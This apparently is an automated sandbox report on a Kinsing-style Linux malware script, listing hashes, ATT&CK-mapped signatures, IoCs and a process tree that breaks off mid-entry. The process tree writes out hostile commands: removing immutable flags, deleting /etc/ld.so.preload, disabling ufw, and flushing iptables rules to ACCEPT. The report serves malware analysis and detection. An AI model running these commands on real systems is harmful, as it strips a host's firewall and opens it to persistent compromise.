78276bd481a04c29109fbbd8313701e5b814165fa4b48515ec4489ccfda93107

Resubmissions

15-03-2024 16:07

240315-tkykeacf7z 1

25-02-2024 14:29

240225-rtjrhaee9z 10

Analysis

max time kernel
5s
max time network
1797s
platform
ubuntu-20.04_amd64
resource
ubuntu2004-amd64-20240221-en
resource tags

arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
submitted
25-02-2024 14:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

script_malware/a58fa03638110727f4a4a227f6ec2c0dceaeb39ccee89d12a4d727bb50d29dc0.sh
Size

11KB
MD5

22a189e0266e0ad722b7e58923eafab5
SHA1

04d01163b1a8ce62aabbc8636aeeb201a3ff28cc
SHA256

a58fa03638110727f4a4a227f6ec2c0dceaeb39ccee89d12a4d727bb50d29dc0
SHA512

12c98beec2d8d7449b79bd42c61f8a8c1c2bffb786ba0c0badeca69df46b10b535491ea6d9f938d7f47476a79a9021d0852ffefd31fcbfa8346e3c794ff55518
SSDEEP

192:Xws08k5tkQPSV3n7/e867jNKvSbRXA8kWmk4lkCIkvUgoaES8DSWOlA+1esH:XQl4/e867USbRXA8kWT4yCtvUgDjdWO7

Score

9^/10

infostealer persistence rootkit

Malware Config

Signatures

Modifies the dynamic linker configuration file 1 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
persistence

Hijack Execution Flow
T1574

Processes:

a58fa03638110727f4a4a227f6ec2c0dceaeb39ccee89d12a4d727bb50d29dc0.sh

description ioc process

File opened for modification /etc/ld.so.preload a58fa03638110727f4a4a227f6ec2c0dceaeb39ccee89d12a4d727bb50d29dc0.sh
Executes dropped EXE 1 IoCs

Processes:

kinsing

ioc pid process

/etc/kinsing 2272 kinsing
Flushes firewall rules 2 IoCs
Flushes/ disables firewall rules inside the Linux kernel.

Processes:

ufwiptables

pid process

1497 ufw
1694 iptables
Loads a kernel module 1 IoCs
Loads a Linux kernel module, potentially to achieve persistence
rootkit

Processes:

modprobe

ioc pid process

/usr/lib/modules/5.4.0-169-generic/kernel/net/ipv6/netfilter/ip6_tables.ko 1502 modprobe

description	ioc	process
File opened for modification	/etc/ld.so.preload	a58fa03638110727f4a4a227f6ec2c0dceaeb39ccee89d12a4d727bb50d29dc0.sh

ioc	pid	process
/etc/kinsing	2272	kinsing

pid	process
1497	ufw
1694	iptables

ioc	pid	process
/usr/lib/modules/5.4.0-169-generic/kernel/net/ipv6/netfilter/ip6_tables.ko	1502	modprobe

Reads EFI boot settings 2 IoCs

Reads EFI boot settings from the efivars filesystem, may contain security secrets or sensitive data.

infostealer

Processes:

systemctlsystemctl

description	ioc	process
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

ip6tablesxargsxargsxargsiptablesiptablesip6tablesip6tablesip6tablesip6tablesip6tableschattrufw-initiptablesiptablesip6tablesxargsip6tablesxargsxargsip6tablesxargsxargsiptablesip6tablesip6tablesxargsiptablesiptablesiptablesip6tableschattriptablesip6tablesiptablesiptablesxargsip6tablesip6tablesip6tablesxargsiptablesiptablesxargschattriptablesiptablesip6tablesxargsiptablesiptablesip6tablesiptablesip6tablesxargsiptablesiptablesxargsxargsxargsxargsiptablesip6tablesip6tables

pid	process
1606	ip6tables
2167	xargs
2171	xargs
2192	xargs
1546	iptables
1587	iptables
1603	ip6tables
1604	ip6tables
1605	ip6tables
1640	ip6tables
1643	ip6tables
1493	chattr
1500	ufw-init
1516	iptables
1522	iptables
1634	ip6tables
1709	xargs
1639	ip6tables
2169	xargs
2187	xargs
1680	ip6tables
2215	xargs
2226	xargs
1554	iptables
1631	ip6tables
1645	ip6tables
2204	xargs
1521	iptables
1533	iptables
1590	iptables
1685	ip6tables
1495	chattr
1519	iptables
1602	ip6tables
1518	iptables
1550	iptables
2231	xargs
1608	ip6tables
1607	ip6tables
1644	ip6tables
2163	xargs
1555	iptables
1582	iptables
2173	xargs
1496	chattr
1513	iptables
1520	iptables
1637	ip6tables
1744	xargs
1553	iptables
1557	iptables
1619	ip6tables
1517	iptables
1599	ip6tables
2165	xargs
1552	iptables
1556	iptables
1724	xargs
1730	xargs
1736	xargs
2161	xargs
1570	iptables
1662	ip6tables
1688	ip6tables

Creates/modifies Cron job 1 TTPs 50 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

Processes:

crontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontabcrontab

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.J3jJyn	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.cLxzQ6	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.jcjNmI	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.BXwAGE	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.2KJFwx	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.hsZ8BN	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.I645pE	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.vQPDQ8	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.DIIiBf	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.9BAYq8	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.7c3NTS	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.WEodro	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.yBJsfk	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.kpRMsF	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.3vjjQe	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.6b6i8G	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.nmyLqx	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.8ducwY	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.FsdPP9	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.Wx6Y2o	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.FNFCSP	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.JG0HXl	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.TPeEHK	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.86KDnB	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.edozOR	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.worWO0	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.vcdSJW	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.ojfHgn	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.LT7HRd	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.dSS7S5	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.E0vsAf	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.buGaEq	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.czmCuI	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.3fYLyD	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.JwWKbT	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.LiduwN	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.czHUZq	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.P5hra4	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.oCnrdN	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.N30Uqq	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.wkz73k	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.eubM3s	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.I4MXQc	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.qindPP	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.NMY5S4	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.Bzvyuv	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.kHyilQ	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.MjkR8Y	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.d3jXY1	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.laIHyB	crontab

Enumerates running processes
Discovers information about currently running processes on the system
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

32 bitbucket.org
33 bitbucket.org
34 bitbucket.org
Modifies systemd 1 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
persistence

Boot or Logon Autostart Execution
T1547

Processes:

a58fa03638110727f4a4a227f6ec2c0dceaeb39ccee89d12a4d727bb50d29dc0.sh

description ioc process

File opened for modification /lib/systemd/system/bot.service a58fa03638110727f4a4a227f6ec2c0dceaeb39ccee89d12a4d727bb50d29dc0.sh

flow	ioc
32	bitbucket.org
33	bitbucket.org
34	bitbucket.org

description	ioc	process
File opened for modification	/lib/systemd/system/bot.service	a58fa03638110727f4a4a227f6ec2c0dceaeb39ccee89d12a4d727bb50d29dc0.sh

Reads CPU attributes 1 TTPs 44 IoCs

System Information Discovery

T1082

Processes:

pspkillpkillpkillpkillpspkillpspspkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpkillpspspkillpkillpkillpkillpsps

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Enumerates kernel/hardware configuration 1 TTPs 4 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

modprobesystemctlsystemctl

description	ioc	process
File opened for reading	/sys/module/ip6_tables/initstate	modprobe
File opened for reading	/sys/module/x_tables/initstate	modprobe
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pkillpkillpspspkillpkillpspspkillpkillpspspkillpkillpkillpkillpkillpkillpspkillpkillpkillpkillpkillpkillpkillpspkillpkill

description	ioc	process
File opened for reading	/proc/23/cmdline	pkill
File opened for reading	/proc/444/status	pkill
File opened for reading	/proc/451/status	ps
File opened for reading	/proc/571/cmdline	ps
File opened for reading	/proc/571/cmdline	pkill
File opened for reading	/proc/1028/cmdline	pkill
File opened for reading	/proc/161/status	pkill
File opened for reading	/proc/10/status	pkill
File opened for reading	/proc/1075/stat	ps
File opened for reading	/proc/904/stat	ps
File opened for reading	/proc/201/status	pkill
File opened for reading	/proc/84/cmdline	pkill
File opened for reading	/proc/172/cmdline	pkill
File opened for reading	/proc/118/status	pkill
File opened for reading	/proc/167/status	ps
File opened for reading	/proc/496/cmdline	ps
File opened for reading	/proc/1109/stat	ps
File opened for reading	/proc/84/status	pkill
File opened for reading	/proc/396/status	pkill
File opened for reading	/proc/632/cmdline	pkill
File opened for reading	/proc/20/status	pkill
File opened for reading	/proc/84/cmdline	pkill
File opened for reading	/proc/907/cmdline	pkill
File opened for reading	/proc/177/cmdline	pkill
File opened for reading	/proc/913/cmdline	pkill
File opened for reading	/proc/1714/stat	ps
File opened for reading	/proc/2155/cmdline	pkill
File opened for reading	/proc/177/cmdline	pkill
File opened for reading	/proc/1492/cmdline	pkill
File opened for reading	/proc/1054/stat	ps
File opened for reading	/proc/306/status	pkill
File opened for reading	/proc/1462/cmdline	pkill
File opened for reading	/proc/1427/status	pkill
File opened for reading	/proc/1427/cmdline	pkill
File opened for reading	/proc/580/stat	ps
File opened for reading	/proc/1109/cmdline	pkill
File opened for reading	/proc/1122/status	pkill
File opened for reading	/proc/5/status	pkill
File opened for reading	/proc/11/status	ps
File opened for reading	/proc/694/stat	ps
File opened for reading	/proc/6/status	pkill
File opened for reading	/proc/105/status	pkill
File opened for reading	/proc/91/stat	ps
File opened for reading	/proc/24/stat	ps
File opened for reading	/proc/1179/status	pkill
File opened for reading	/proc/535/status	pkill
File opened for reading	/proc/175/status	pkill
File opened for reading	/proc/1750/status	pkill
File opened for reading	/proc/633/stat	ps
File opened for reading	/proc/668/status	pkill
File opened for reading	/proc/1432/cmdline	pkill
File opened for reading	/proc/1033/stat	ps
File opened for reading	/proc/1117/cmdline	pkill
File opened for reading	/proc/1137/status	pkill
File opened for reading	/proc/23/cmdline	pkill
File opened for reading	/proc/201/cmdline	ps
File opened for reading	/proc/1477/status	ps
File opened for reading	/proc/76/cmdline	pkill
File opened for reading	/proc/500/status	pkill
File opened for reading	/proc/1079/status	pkill
File opened for reading	/proc/84/cmdline	ps
File opened for reading	/proc/242/cmdline	pkill
File opened for reading	/proc/200/status	pkill
File opened for reading	/proc/438/cmdline	pkill

/tmp/script_malware/a58fa03638110727f4a4a227f6ec2c0dceaeb39ccee89d12a4d727bb50d29dc0.sh
/tmp/script_malware/a58fa03638110727f4a4a227f6ec2c0dceaeb39ccee89d12a4d727bb50d29dc0.sh
1⤵
- Modifies the dynamic linker configuration file
- Modifies systemd
PID:1492

/usr/bin/chattr
chattr -i /etc/ld.so.preload
2⤵
- Attempts to change immutable files
PID:1493

/usr/bin/rm
rm -f /etc/ld.so.preload
2⤵
PID:1494

/usr/bin/chattr
chattr -R -i /var/spool/cron
2⤵
- Attempts to change immutable files
PID:1495

/usr/bin/chattr
chattr -i /etc/crontab
2⤵
- Attempts to change immutable files
PID:1496

/usr/sbin/ufw
ufw disable
2⤵
- Flushes firewall rules
PID:1497

/usr/sbin/iptables
/usr/sbin/iptables -V
3⤵
PID:1499

/lib/ufw/ufw-init
/lib/ufw/ufw-init force-stop
3⤵
- Attempts to change immutable files
PID:1500

/sbin/ip6tables
ip6tables -L INPUT -n
4⤵
PID:1501

/sbin/modprobe
/sbin/modprobe ip6_tables
5⤵
- Loads a kernel module
- Enumerates kernel/hardware configuration
PID:1502

/sbin/iptables
iptables -F ufw-logging-deny
4⤵
PID:1504

/sbin/iptables
iptables -F ufw-logging-allow
4⤵
PID:1511

/sbin/iptables
iptables -F ufw-not-local
4⤵
PID:1512

/sbin/iptables
iptables -F ufw-user-logging-input
4⤵
- Attempts to change immutable files
PID:1513

/sbin/iptables
iptables -F ufw-user-limit-accept
4⤵
PID:1514

/sbin/iptables
iptables -F ufw-user-limit
4⤵
PID:1515

/sbin/iptables
iptables -F ufw-skip-to-policy-input
4⤵
- Attempts to change immutable files
PID:1516

/sbin/iptables
iptables -F ufw-reject-input
4⤵
- Attempts to change immutable files
PID:1517

/sbin/iptables
iptables -F ufw-after-logging-input
4⤵
- Attempts to change immutable files
PID:1518

/sbin/iptables
iptables -F ufw-after-input
4⤵
- Attempts to change immutable files
PID:1519

/sbin/iptables
iptables -F ufw-user-input
4⤵
- Attempts to change immutable files
PID:1520

/sbin/iptables
iptables -F ufw-before-input
4⤵
- Attempts to change immutable files
PID:1521

/sbin/iptables
iptables -F ufw-before-logging-input
4⤵
- Attempts to change immutable files
PID:1522

/sbin/iptables
iptables -F ufw-skip-to-policy-forward
4⤵
PID:1523

/sbin/iptables
iptables -F ufw-reject-forward
4⤵
PID:1524

/sbin/iptables
iptables -F ufw-after-logging-forward
4⤵
PID:1525

/sbin/iptables
iptables -F ufw-after-forward
4⤵
PID:1526

/sbin/iptables
iptables -F ufw-user-logging-forward
4⤵
PID:1527

/sbin/iptables
iptables -F ufw-user-forward
4⤵
PID:1528

/sbin/iptables
iptables -F ufw-before-forward
4⤵
PID:1529

/sbin/iptables
iptables -F ufw-before-logging-forward
4⤵
PID:1530

/sbin/iptables
iptables -F ufw-track-forward
4⤵
PID:1531

/sbin/iptables
iptables -F ufw-track-output
4⤵
PID:1532

/sbin/iptables
iptables -F ufw-track-input
4⤵
- Attempts to change immutable files
PID:1533

/sbin/iptables
iptables -F ufw-skip-to-policy-output
4⤵
PID:1534

/sbin/iptables
iptables -F ufw-reject-output
4⤵
PID:1535

/sbin/iptables
iptables -F ufw-after-logging-output
4⤵
PID:1536

/sbin/iptables
iptables -F ufw-after-output
4⤵
PID:1537

/sbin/iptables
iptables -F ufw-user-logging-output
4⤵
PID:1538

/sbin/iptables
iptables -F ufw-user-output
4⤵
PID:1539

/sbin/iptables
iptables -F ufw-before-output
4⤵
PID:1540

/sbin/iptables
iptables -F ufw-before-logging-output
4⤵
PID:1541

/sbin/iptables
iptables -Z ufw-logging-deny
4⤵
PID:1542

/sbin/iptables
iptables -Z ufw-logging-allow
4⤵
PID:1543

/sbin/iptables
iptables -Z ufw-not-local
4⤵
PID:1544

/sbin/iptables
iptables -Z ufw-user-logging-input
4⤵
- Attempts to change immutable files
PID:1546

/sbin/iptables
iptables -Z ufw-user-limit-accept
4⤵
PID:1547

/sbin/iptables
iptables -Z ufw-user-limit
4⤵
PID:1549

/sbin/iptables
iptables -Z ufw-skip-to-policy-input
4⤵
- Attempts to change immutable files
PID:1550

/sbin/iptables
iptables -Z ufw-reject-input
4⤵
- Attempts to change immutable files
PID:1552

/sbin/iptables
iptables -Z ufw-after-logging-input
4⤵
- Attempts to change immutable files
PID:1553

/sbin/iptables
iptables -Z ufw-after-input
4⤵
- Attempts to change immutable files
PID:1554

/sbin/iptables
iptables -Z ufw-user-input
4⤵
- Attempts to change immutable files
PID:1555

/sbin/iptables
iptables -Z ufw-before-input
4⤵
- Attempts to change immutable files
PID:1556

/sbin/iptables
iptables -Z ufw-before-logging-input
4⤵
- Attempts to change immutable files
PID:1557

/sbin/iptables
iptables -Z ufw-skip-to-policy-forward
4⤵
PID:1558

/sbin/iptables
iptables -Z ufw-reject-forward
4⤵
PID:1559

/sbin/iptables
iptables -Z ufw-after-logging-forward
4⤵
PID:1560

/sbin/iptables
iptables -Z ufw-after-forward
4⤵
PID:1561

/sbin/iptables
iptables -Z ufw-user-logging-forward
4⤵
PID:1562

/sbin/iptables
iptables -Z ufw-user-forward
4⤵
PID:1563

/sbin/iptables
iptables -Z ufw-before-forward
4⤵
PID:1566

/sbin/iptables
iptables -Z ufw-before-logging-forward
4⤵
PID:1567

/sbin/iptables
iptables -Z ufw-track-forward
4⤵
PID:1568

/sbin/iptables
iptables -Z ufw-track-output
4⤵
PID:1569

/sbin/iptables
iptables -Z ufw-track-input
4⤵
- Attempts to change immutable files
PID:1570

/sbin/iptables
iptables -Z ufw-skip-to-policy-output
4⤵
PID:1571

/sbin/iptables
iptables -Z ufw-reject-output
4⤵
PID:1572

/sbin/iptables
iptables -Z ufw-after-logging-output
4⤵
PID:1573

/sbin/iptables
iptables -Z ufw-after-output
4⤵
PID:1574

/sbin/iptables
iptables -Z ufw-user-logging-output
4⤵
PID:1575

/sbin/iptables
iptables -Z ufw-user-output
4⤵
PID:1576

/sbin/iptables
iptables -Z ufw-before-output
4⤵
PID:1577

/sbin/iptables
iptables -Z ufw-before-logging-output
4⤵
PID:1578

/sbin/iptables
iptables -X ufw-logging-deny
4⤵
PID:1579

/sbin/iptables
iptables -X ufw-logging-allow
4⤵
PID:1580

/sbin/iptables
iptables -X ufw-not-local
4⤵
PID:1581

/sbin/iptables
iptables -X ufw-user-logging-input
4⤵
- Attempts to change immutable files
PID:1582

/sbin/iptables
iptables -X ufw-user-logging-output
4⤵
PID:1583

/sbin/iptables
iptables -X ufw-user-logging-forward
4⤵
PID:1584

/sbin/iptables
iptables -X ufw-user-limit-accept
4⤵
PID:1585

/sbin/iptables
iptables -X ufw-user-limit
4⤵
PID:1586

/sbin/iptables
iptables -X ufw-user-input
4⤵
- Attempts to change immutable files
PID:1587

/sbin/iptables
iptables -X ufw-user-forward
4⤵
PID:1588

/sbin/iptables
iptables -X ufw-user-output
4⤵
PID:1589

/sbin/iptables
iptables -X ufw-skip-to-policy-input
4⤵
- Attempts to change immutable files
PID:1590

/sbin/iptables
iptables -X ufw-skip-to-policy-output
4⤵
PID:1591

/sbin/iptables
iptables -X ufw-skip-to-policy-forward
4⤵
PID:1592

/sbin/iptables
iptables -P INPUT ACCEPT
4⤵
PID:1593

/sbin/iptables
iptables -P OUTPUT ACCEPT
4⤵
PID:1594

/sbin/iptables
iptables -P FORWARD ACCEPT
4⤵
PID:1595

/sbin/ip6tables
ip6tables -F ufw6-logging-deny
4⤵
PID:1596

/sbin/ip6tables
ip6tables -F ufw6-logging-allow
4⤵
PID:1597

/sbin/ip6tables
ip6tables -F ufw6-not-local
4⤵
PID:1598

/sbin/ip6tables
ip6tables -F ufw6-user-logging-input
4⤵
- Attempts to change immutable files
PID:1599

/sbin/ip6tables
ip6tables -F ufw6-user-limit-accept
4⤵
PID:1600

/sbin/ip6tables
ip6tables -F ufw6-user-limit
4⤵
PID:1601

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-input
4⤵
- Attempts to change immutable files
PID:1602

/sbin/ip6tables
ip6tables -F ufw6-reject-input
4⤵
- Attempts to change immutable files
PID:1603

/sbin/ip6tables
ip6tables -F ufw6-after-logging-input
4⤵
- Attempts to change immutable files
PID:1604

/sbin/ip6tables
ip6tables -F ufw6-after-input
4⤵
- Attempts to change immutable files
PID:1605

/sbin/ip6tables
ip6tables -F ufw6-user-input
4⤵
- Attempts to change immutable files
PID:1606

/sbin/ip6tables
ip6tables -F ufw6-before-input
4⤵
- Attempts to change immutable files
PID:1607

/sbin/ip6tables
ip6tables -F ufw6-before-logging-input
4⤵
- Attempts to change immutable files
PID:1608

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-forward
4⤵
PID:1609

/sbin/ip6tables
ip6tables -F ufw6-reject-forward
4⤵
PID:1610

/sbin/ip6tables
ip6tables -F ufw6-after-logging-forward
4⤵
PID:1611

/sbin/ip6tables
ip6tables -F ufw6-after-forward
4⤵
PID:1612

/sbin/ip6tables
ip6tables -F ufw6-user-logging-forward
4⤵
PID:1613

/sbin/ip6tables
ip6tables -F ufw6-user-forward
4⤵
PID:1614

/sbin/ip6tables
ip6tables -F ufw6-before-forward
4⤵
PID:1615

/sbin/ip6tables
ip6tables -F ufw6-before-logging-forward
4⤵
PID:1616

/sbin/ip6tables
ip6tables -F ufw6-track-forward
4⤵
PID:1617

/sbin/ip6tables
ip6tables -F ufw6-track-output
4⤵
PID:1618

/sbin/ip6tables
ip6tables -F ufw6-track-input
4⤵
- Attempts to change immutable files
PID:1619

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-output
4⤵
PID:1620

/sbin/ip6tables
ip6tables -F ufw6-reject-output
4⤵
PID:1621

/sbin/ip6tables
ip6tables -F ufw6-after-logging-output
4⤵
PID:1622

/sbin/ip6tables
ip6tables -F ufw6-after-output
4⤵
PID:1623

/sbin/ip6tables
ip6tables -F ufw6-user-logging-output
4⤵
PID:1624

/sbin/ip6tables
ip6tables -F ufw6-user-output
4⤵
PID:1625

/sbin/ip6tables
ip6tables -F ufw6-before-output
4⤵
PID:1626

/sbin/ip6tables
ip6tables -F ufw6-before-logging-output
4⤵
PID:1627

/sbin/ip6tables
ip6tables -Z ufw6-logging-deny
4⤵
PID:1628

/sbin/ip6tables
ip6tables -Z ufw6-logging-allow
4⤵
PID:1629

/sbin/ip6tables
ip6tables -Z ufw6-not-local
4⤵
PID:1630

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-input
4⤵
- Attempts to change immutable files
PID:1631

/sbin/ip6tables
ip6tables -Z ufw6-user-limit-accept
4⤵
PID:1632

/sbin/ip6tables
ip6tables -Z ufw6-user-limit
4⤵
PID:1633

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-input
4⤵
- Attempts to change immutable files
PID:1634

/sbin/ip6tables
ip6tables -Z ufw6-reject-input
4⤵
- Attempts to change immutable files
PID:1637

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-input
4⤵
- Attempts to change immutable files
PID:1639

/sbin/ip6tables
ip6tables -Z ufw6-after-input
4⤵
- Attempts to change immutable files
PID:1640

/sbin/ip6tables
ip6tables -Z ufw6-user-input
4⤵
- Attempts to change immutable files
PID:1643

/sbin/ip6tables
ip6tables -Z ufw6-before-input
4⤵
- Attempts to change immutable files
PID:1644

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-input
4⤵
- Attempts to change immutable files
PID:1645

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-forward
4⤵
PID:1647

/sbin/ip6tables
ip6tables -Z ufw6-reject-forward
4⤵
PID:1648

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-forward
4⤵
PID:1650

/sbin/ip6tables
ip6tables -Z ufw6-after-forward
4⤵
PID:1652

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-forward
4⤵
PID:1653

/sbin/ip6tables
ip6tables -Z ufw6-user-forward
4⤵
PID:1655

/sbin/ip6tables
ip6tables -Z ufw6-before-forward
4⤵
PID:1656

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-forward
4⤵
PID:1659

/sbin/ip6tables
ip6tables -Z ufw6-track-forward
4⤵
PID:1660

/sbin/ip6tables
ip6tables -Z ufw6-track-output
4⤵
PID:1661

/sbin/ip6tables
ip6tables -Z ufw6-track-input
4⤵
- Attempts to change immutable files
PID:1662

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-output
4⤵
PID:1665

/sbin/ip6tables
ip6tables -Z ufw6-reject-output
4⤵
PID:1666

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-output
4⤵
PID:1667

/sbin/ip6tables
ip6tables -Z ufw6-after-output
4⤵
PID:1669

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-output
4⤵
PID:1670

/sbin/ip6tables
ip6tables -Z ufw6-user-output
4⤵
PID:1672

/sbin/ip6tables
ip6tables -Z ufw6-before-output
4⤵
PID:1673

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-output
4⤵
PID:1676

/sbin/ip6tables
ip6tables -X ufw6-logging-deny
4⤵
PID:1677

/sbin/ip6tables
ip6tables -X ufw6-logging-allow
4⤵
PID:1678

/sbin/ip6tables
ip6tables -X ufw6-not-local
4⤵
PID:1679

/sbin/ip6tables
ip6tables -X ufw6-user-logging-input
4⤵
- Attempts to change immutable files
PID:1680

/sbin/ip6tables
ip6tables -X ufw6-user-logging-output
4⤵
PID:1681

/sbin/ip6tables
ip6tables -X ufw6-user-logging-forward
4⤵
PID:1682

/sbin/ip6tables
ip6tables -X ufw6-user-limit-accept
4⤵
PID:1683

/sbin/ip6tables
ip6tables -X ufw6-user-limit
4⤵
PID:1684

/sbin/ip6tables
ip6tables -X ufw6-user-input
4⤵
- Attempts to change immutable files
PID:1685

/sbin/ip6tables
ip6tables -X ufw6-user-forward
4⤵
PID:1686

/sbin/ip6tables
ip6tables -X ufw6-user-output
4⤵
PID:1687

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-input
4⤵
- Attempts to change immutable files
PID:1688

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-output
4⤵
PID:1689

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-forward
4⤵
PID:1690

/sbin/ip6tables
ip6tables -P INPUT ACCEPT
4⤵
PID:1691

/sbin/ip6tables
